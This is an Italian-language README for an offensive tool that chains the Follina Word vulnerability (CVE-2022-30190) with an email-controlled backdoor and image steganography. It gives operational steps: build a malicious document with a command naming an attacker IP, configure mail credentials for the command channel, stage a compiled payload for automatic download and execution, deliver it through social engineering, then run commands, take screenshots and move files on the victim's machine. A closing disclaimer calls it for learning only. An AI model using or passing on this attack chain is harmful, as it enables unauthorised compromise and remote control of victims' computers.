AmzWord
una catena d'attacco automatizzata basata su CVE-2022-30190, backdoor email 163 e steganografia delle immagini
Grazie ai seguenti repository GitHub, abbiamo fatto riferimento e modificato parte del codice per integrare e realizzare il nostro lavoro:
README in cinese clicca qui
Requisiti
gdog:
- Python 2.7
- Modulo PyCrypto
- Modulo WMI
- Modulo Enum34
- Modulo Netifaces
follina:
Utilizzo e processo d'attacco
-
Usa follina.py per creare un file Word malevolo e avvia l'ascolto HTTP
- Puoi modificare il nome predefinito e l'IP predefinito nel codice
- Puoi anche usare
--ip e --output per specificarli
- Per l'uso dettagliato, consulta follina. Non abbiamo modificato l'interfaccia di utilizzo.
- es:
python follina.py --ip 100.100.100.100 --output maldoc.doc
-
Modifica client.py e gdog.py nella directory gdog e inserisci le seguenti informazioni
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
-
Compila client.py in tar.exe e posizionalo in /follina/www
-
Usa qualsiasi metodo di ingegneria sociale per inviarlo al target. Non appena la vittima apre Word, tar.exe verrà automaticamente scaricato ed eseguito.
-
L'attaccante esegue gdog localmente e invia comandi per controllare la macchina target. Per l'uso, vedi gdog
Nota
- Questa è solo una demo dell'implementazione della catena d'attacco. L'exe in esecuzione può essere addirittura trovato nel task manager, il che rende facile osservare l'effetto. Non abbiamo eseguito alcuna operazione come antivirus, occultamento o escalation dei privilegi. Ovviamente, queste non sono complicate su Windows, vero?
- Il progetto gdog è in circolazione da molto tempo e abbiamo dedicato molto sforzo per farlo funzionare con successo. I comandi di controllo remoto attualmente confermati includono: esecuzione di comandi, screenshot, finestre pop-up, spegnimento, blocco dello schermo e trasferimento di file. Queste funzioni sono sufficienti per la maggior parte delle esigenze.
- Non so perché, ma sembra esserci un problema con la ricerca SUBJECT di IMAP. Non possiamo cercare email con l'oggetto target e il valore restituito è vuoto. Possiamo solo adottare altri metodi, come leggere tutte le email non lette, filtrare i target e poi impostare le altre come non lette. Questo potrebbe causare problemi quando ci sono molti utenti controllati e va risolto.
- Questo progetto è solo a scopo di apprendimento e scambio.